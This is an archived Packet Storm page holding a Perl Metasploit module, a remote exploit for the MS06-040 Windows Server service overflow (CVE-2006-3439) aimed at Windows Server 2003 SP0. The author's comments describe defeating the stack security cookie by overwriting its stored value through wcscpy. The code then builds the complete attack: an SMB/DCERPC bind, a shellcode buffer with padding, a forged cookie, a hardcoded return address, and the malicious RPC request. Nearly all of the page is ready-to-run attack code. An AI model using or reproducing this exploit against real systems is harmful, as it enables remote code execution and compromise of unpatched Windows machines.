what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

netapi_win2003.pm.txt

netapi_win2003.pm.txt
Posted Sep 14, 2006
Authored by Trirat Puttaraksa | Site sf-freedom.blogspot.com

This Metasploit module exploits the MS Windows NetplsRemote() remote overflow as described in MS06-040. This particular exploit is for Windows Server 2003 SP0.

tags | exploit, remote, overflow
systems | windows
SHA-256 | 4ab90d9466872b753bf451bf3a0216a6b72372d9a4668ba98f4728320c67314e

netapi_win2003.pm.txt

Change Mirror Download
#########################################################################
# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
#
# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
# For educational purpose only
#
# Note: This exploit is developed because of my question "Is it exploitable
# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
# Server 2003 SP1 is not exploitable because they are compiled with /GS, but
# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there
# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not
# exploitable ? There is Stack Protection Windows Server 2003, is this the
# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ?
#
# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him
# ^-^) and work on it. The problem is the Stack Protection "security cookie
# checking". Because wcscpy() method allow me to write to any memory location
# that are marked writable, I decide to write to the location at "security
# cookie" is stored and it works !!! I will describe more implementation details
# in my blog in few days ^-^
#
# This exploit tested on Windows Server 2003 SP0 build 3790 and successful
# exploit 2003 machine in my environment - all patch before MS06-040
# (KB921883). It's quite reliable but not 100%. There is the possibility that
# the exploit will fail and the target system process crash. Because I have
# only one testbase system, I couldn't confirm this exploit will work on
# your environment. However feel free to e-mail to me.
#
# Credits: H D Moore
#########################################################################

package Msf::Exploit::netapi_win2003;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
'FragSize' => [ 256, 'The DCERPC fragment size' ],
'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],
'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],
};

my $info = {
'Name' => 'MSO6-040 Windows Server 2003 Target',
'Version' => '',
'Authors' =>
[
'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',
],

'Arch' => ['x86'],
'OS' => [ 'win32', 'win2003' ],
'Priv' => 1,

'AutoOpts' => { 'EXITFUNC' => 'thread' },

'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The target address' ],

# SMB connection options
'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
},

'Payload' =>
{
# Technically we can use more space than this, but by limiting it
# to 370 bytes we can use the same request for all Windows SPs.
'Space' => 370,

'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'Keys' => ['+ws2ord'],

# sub esp, 4097 + inc esp makes stack happy
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},

'Description' => Pex::Text::Freeform(
qq{
This exploit modified from netapi_ms06_040.pm (Metasploit).
While netapi_ms06_040 of metasploit works on Windows 2000
SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on
Windows Server 2003 SP0.
}
),

'Refs' =>
[
[ 'BID', '19409' ],
[ 'CVE', '2006-3439' ],
[ 'MSB', 'MS06-040' ],
],

'DefaultTarget' => 0,
'Targets' =>
[
[ '(wcscpy) Windows Server 2003 SP0', 612],
],

'Keys' => ['srvsvc'],

'DisclosureDate' => '',
};

sub new {
my ($class) = @_;
my $self =
$class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
return ($self);
}

sub Exploit {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target_name = '*SMBSERVER';

my $FragSize = $self->GetVar('FragSize') || 256;
my $target = $self->Targets->[$target_idx];

if (!$self->InitNops(128)) {
$self->PrintLine("Could not initialize the nop module");
return;
}

my ( $res, $rpc );

my $pipe = '\BROWSER';
my $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
my $version = '3.0';

my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );

my $dce = Pex::DCERPC->new(
'handle' => $handle,
'username' => $self->GetVar('SMBUSER'),
'password' => $self->GetVar('SMBPASS'),
'domain' => $self->GetVar('SMBDOM'),
'fragsize' => $self->GetVar('FragSize'),
'bindevasion' => $self->GetVar('BindEvasion'),
'directsmb' => $self->GetVar('DirectSMB'),
);

if ( !$dce ) {
$self->PrintLine("[*] Could not bind to $handle");
return;
}

my $smb = $dce->{'_handles'}{$handle}{'connection'};

if (! $smb) {
$self->PrintLine("[*] Could not establish SMB session");
return;
}

my $stub;

#
# Use the wcscpy() method on Windows Server 2003 SP0
#
if ($target->[0] =~ /2003/) {

my $path =
$shellcode.

# Padding
Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
Pex::Text::AlphaNumText(32).
substr($shellcode, 0, 4). # cookie
Pex::Text::AlphaNumText(4).
# return address == address that store security cookie
("\xec\xc1\xc8\x71") .
Pex::Text::AlphaNumText(8).

("\xec\xc1\xc8\x71" x 2) .
Pex::Text::AlphaNumText(36).

# Terminate
"\x00\x00";


# Package that into a stub
$stub =
Pex::NDR::Long(int(rand(0xffffffff))).
Pex::NDR::UnicodeConformantVaryingString('').
Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
Pex::NDR::Long(int(rand(250)+1)).
Pex::NDR::UnicodeConformantVaryingString('').
Pex::NDR::Long(int(rand(250)+1)).
Pex::NDR::Long(0);
}
else {
$self->PrintLine("This target is not currently supported");
return;
}


$self->PrintLine("[*] Sending request...");

# Function 0x1f is not the only way to exploit this :-)
my @response = $dce->request( $handle, 0x1f, $stub );

if ( length($dce->{'response'}->{'StubData'}) > 0) {
$self->PrintLine("[*] The server rejected it, trying again...");
@response = $dce->request( $handle, 0x1f, $stub );
}

if ( length($dce->{'response'}->{'StubData'}) > 0) {
$self->PrintLine("[*] Exploit Failed");
}

if (@response) {
$self->PrintLine('[*] RPC server responded with:');
foreach my $line (@response) {
$self->PrintLine( '[*] ' . $line );
}
}

return;
}

1;
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close